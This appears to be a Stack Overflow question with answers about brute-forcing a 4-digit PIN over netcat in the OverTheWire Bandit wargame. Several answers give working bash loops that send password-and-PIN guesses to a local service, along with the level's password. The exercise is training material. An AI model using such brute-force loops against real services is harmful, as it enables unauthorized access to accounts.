# Brute-force 4 digit pin with pass using shell script

Tags: bash, shell-script, command-line, nc

I am doing some challenges. This is one them. I am trying to brute-force 4 digit pin with the password to get my desired answer. After connecting to the port It prompts me to enter the password then space then 4 digit pin. I tried to brute-force the pin using the script:

```
 #!/bin/bash 
 nc localhost 30002 
 sleep 2 

 for i in {0000..9999}; 
     if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i' </dev/stdin) = ^Wrong*]];                   
     then 
        continue 
     echo '[+] Pincode Cracked! Pincode = $i' 
     fi 
 done
```

but it seems that this doesn't input the pass and pin to stdin, before i tried doing something like this -> `if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i') = ^Wrong* ]];` What am I doing wrong here?

### UPDATE:

Okay, so after researching around. I wrote this:

```
for i in {0000..9999}
do
    if [ (echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -o Wrong) == "Wrong" ]
   then
      sleep 0.1
      continue
   fi
   echo "- - - - - - - - - - - - - - - - - - - - - - - - [$i]"
done
```

This might even work but as you can see it opens new connections in the loop which makes it really slow and exhaust the system.

Comment: You're missing a `do` in your `for` loop. `$i` is in single quotes in both places so it wont be expanded.  You need a space after `^Wrong*` and before `]]`. `continue` will cause it to skip `echo '[+] Pincode Cracked! Pincode = $i'` **every time**.

Comment: Put your code into https://shellcheck.net/ When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

Comment: OverTheWire brought me here :)

Answer (score 3, accepted):

That's because you're not *telling* your script to write anything to `nc`'s standard input.  Your script starts netcat, *waits for it to terminate*, and then `sleep`s for two seconds before executing the `for` loop.  You probably want a construct such as:

```
for i in {0000..9999}; do
    : stuff
done | nc localhost 30002
```

Answer (score 4):

Here a working answere that is fast and working:

```
#!/bin/bash
passwd24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {0000..9999}; do
            echo "$passwd24 $i"
done | nc localhost 30002  | grep -v Wrong | grep -v "I am the pincode checker for user bandit25"
```

Your updated answer is very slow. The connections will live when a wrong answer is filled in. Like a earlier answer showed, is a pipeline at the end of the for-loop. If you really wanne know the correct pin you can add a line before the echo that `echo "the correct pass: $1" > /tmp/correctpin.txt`. This is not relevant for the purpose of receiving the correct passwd.

Answer (score 3):

you can pipe the loop into the netcat connection and write the output into a file as following:

```bsh
#!/bin/bash
touch f.txt
for i in {0000..9999}
do
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
done | nc localhost 30002 > f.txt

cat f.txt | grep -v Wrong
```

if it hangs and don't complete the loop, you can split it into 2 parts each one 5000 iterations:

```bsh
#!/bin/bash

for j in {0000..5000}
do
    str1="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $j"
    echo $str1
done | nc localhost 30002 > f.txt

cat f.txt | grep -v Wrong

sleep 5

for i in {5000..9999}
do
    str2="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
    echo $str2
done | nc 127.0.0.1 30002 > f.txt

cat f.txt |grep -v Wrong
```

Answer (score 1):

Create a file with below script, make it executable(chmod 777 filename) and run it(./filename):

```
for i in {0000..9999}; do
    echo "passwordforbandit24" $i
    done | nc localhost 30002 | uniq -u
```

Answer (score -1):

```
for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002; done
```

Answer (score -1):

Following is single-line command :)

It covers give all possible combinations

$ for i in {0..9999}; do echo "zzzzzzzzzzzzzzzzzzz "$i; done | nc localhost port

If you are having problem with time :D

for i in {5000..9999}; do echo "zzzzzzzzzzzzzzzzzzz "$i; done | nc localhost port

Answer (score -3):

Getting pin in this challenge is not more important than getting the bandit25 user password, so 
use the shellscript code as follows:

```
for i in {0000..9999}
do echo "bandit24userpassword $i"
done | ncat localhost 30009 > file.txt
```

Simple save the above code in the `/tmp` dir and make it executable using `chmod 777 script_name.sh`. 
Run    `./script_name.sh` then kill the script after 2 seconds.
Now open the `file.txt`:   `cat file.txt`.
At last you get the password of bandit25 user.